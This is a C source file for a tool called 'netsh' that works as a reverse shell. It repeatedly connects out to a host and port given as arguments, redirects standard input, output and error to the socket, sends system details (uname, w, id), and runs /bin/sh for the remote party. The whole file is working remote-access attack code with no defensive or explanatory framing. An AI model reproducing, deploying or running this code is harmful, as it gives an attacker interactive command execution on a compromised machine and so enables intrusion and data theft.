
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <signal.h>

#define DEBUG

#define NAME "netsh"

#define MOTD printf("\tWelcome!\n"); \
		system("uname -s"); \
		system("uname -n"); \
		system("uname -r"); \
		system("uname -v"); \
		system("uname -m"); \
		system("uname -o"); \
		printf("\n"); \
		system("w"); \
		printf("\n"); \
		system("id"); \
		printf("\n");

/* number of pending connections in the queue */
#define BACKLOG 10
/* max number of bytes for transfer at once */
#define MAXDATASIZE 32*1024

/* usage info */
int usage(void)
{
	printf("%s [host] [port]\n", NAME);
	return 1;
}

/* signal handler */
void sigchld_handler(int s)
{
	while(waitpid(-1, NULL, WNOHANG) > 0);
}

/* exec routine */
int exec(char *cmd, char *const args[])
{
	int status;
	pid_t child;
	if (!(child = fork())) {
		execve(cmd, args, NULL);
		exit(0);
	}
	waitpid(child, &status, 0);
	if (WIFEXITED(status) && WEXITSTATUS(status) == 0) {
		return 0;
	} else {
		return -1;
	}
}

/* get sockaddr : IPv4 or IPv6 */
void *get_in_addr(struct sockaddr *sa)
{
	if (sa->sa_family == AF_INET) {
		return &(((struct sockaddr_in*)sa)->sin_addr);
	}
	
	return &(((struct sockaddr_in6*)sa)->sin6_addr);
}

int shell_server(const char *ip, const char *port)
{
	/* setup shell commands */
	char *sh = "/bin//sh";
	char *const sh_args[] = {sh, NULL};
	
	/* sockfd for listen(), new_fd for accept() */
	int sockfd, new_fd;
	
	/* client's address information */
	struct sockaddr_storage their_addr;
	
	struct sigaction sa;
	struct addrinfo hints, *servinfo, *p;
	socklen_t sin_size;
	char s[INET6_ADDRSTRLEN];
	
	char cmd[MAXDATASIZE];
	int numbytes;
	int rv;
	int yes = 1;
	
	/* init output */
	printf("%c",0x0);
	
	/* init routine */
	memset(&hints, 0, sizeof hints);
	hints.ai_socktype = SOCK_STREAM;
	hints.ai_family = AF_UNSPEC;
	//hints.ai_flags = AI_PASSIVE;
	while(1) {
	if ((rv = getaddrinfo(ip, port, &hints, &servinfo)) != 0) {
#ifdef DEBUG
		fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(rv));
#endif
		return 1;
	}
	
	/* loop through all the results and bind to the first we can */
	for (p = servinfo; p != NULL; p = p->ai_next) {
		if ((sockfd = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
#ifdef DEBUG
			perror("server: socket");
#endif
			continue;
		}
		/*
		if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1) {
#ifdef DEBUG
			perror("setsockopt");
#endif
			exit(1);
		}
		*/
		if (connect(sockfd, p->ai_addr, p->ai_addrlen) == -1) {
			close(sockfd);
#ifdef DEBUG
			perror("server: connect");
#endif
			continue;
		}
		
		break;
	}
	
	if (p == NULL)  {
#ifdef DEBUG
		fprintf(stderr, "server: failed to connect\n");
#endif
		//return 2;
		sleep(1);
		continue;
	}
		break;
	}
	
	inet_ntop(p->ai_family, get_in_addr((struct sockaddr *)p->ai_addr), s, sizeof s);
	
	/* free structure since it's not using anymore */
	freeaddrinfo(servinfo);
	
	/* reap all dead processes */
	sa.sa_handler = sigchld_handler;
	sigemptyset(&sa.sa_mask);
	sa.sa_flags = SA_RESTART;
	if (sigaction(SIGCHLD, &sa, NULL) == -1) {
#ifdef DEBUG
		perror("sigaction");
#endif
		exit(1);
	}
	
	/* duplicate desciptors for backup */
	int std_in = dup(STDIN_FILENO);
	int std_out = dup(STDOUT_FILENO);
	int std_err = dup(STDERR_FILENO);
	
#ifdef DEBUG
	printf("server: waiting for connections...\n");
#endif
	
	/* int address = 0x7F000001; */
	
	/* main accept() loop */
		/*
	while (1) {
		sin_size = sizeof their_addr;
		new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size);
		if (new_fd == -1) {
#ifdef DEBUG
			perror("accept");
#endif
			continue;
		}
		*/
		//inet_ntop(their_addr.ss_family, get_in_addr((struct sockaddr *)&their_addr), s, sizeof s);

#ifdef DEBUG
		printf("server: got connection from %s\n", s);
#endif
		/* source address checking */
		/*
		if (address != ntohl(((struct sockaddr_in *)&their_addr)->sin_addr.s_addr)) {
#ifdef DEBUG
			printf("I won't talk with you\n");
#endif
			exit(3);
		}
		*/
		
		/* init the child process for processing connect() from client */
		//if (!fork()) {
			/* close parents' socket for accept() */
		//	close(sockfd);
			
			/* flush descriptors so write data before redirecting */
			/*
			fflush(stdin);
			fflush(stdout);
			fflush(stderr);
			*/
			
			/* redirect standard input/output/error to the file using dup2 */
			if (dup2(sockfd, STDIN_FILENO) < 0) {
#ifdef DEBUG
				printf("dup2: in\n");
#endif
				return 1;
			}
			if (dup2(sockfd, STDOUT_FILENO) < 0) {
#ifdef DEBUG
				printf("dup2: out\n");
#endif
				return 1;
			}
			if (dup2(sockfd, STDERR_FILENO) < 0) {
#ifdef DEBUG
				printf("dup2: err\n");
#endif
				return 1;
			}
			
			/* show welcome message */
			MOTD
			
			/* execute remote shell */
//			execve(sh, sh_args, NULL);
			exec(sh, sh_args);
			
			/* flush descriptors so write data before restoring */
			fflush(stdin);
			fflush(stdout);
			fflush(stderr);
			
			/* restore output */
			dup2(std_in, STDIN_FILENO);
			dup2(std_out, STDOUT_FILENO);
			dup2(std_err, STDERR_FILENO);
			
			/* flush descriptors after restoring */
			/*
			fflush(stdin);
			fflush(stdout);
			fflush(stderr);
			*/
/*
#ifdef DEBUG
			printf("Connection closed.\n");
#endif
			
			close(new_fd);
			
			exit(0);
		}
*/
		
		/* socket has been processed in the child process */
		close(sockfd);
	//}
	
	return 0;
}

int main(int argc, const char *argv[])
{
	if (argc != 3) {
		return usage();
	}
	
	if ((atoi(argv[2]) < 1024) && (getuid())) {
#ifdef DEBUG
		printf("You need to be root\n");
#endif
		return -1;
	}
	
	shell_server(argv[1], argv[2]);
	
	return 0;
}

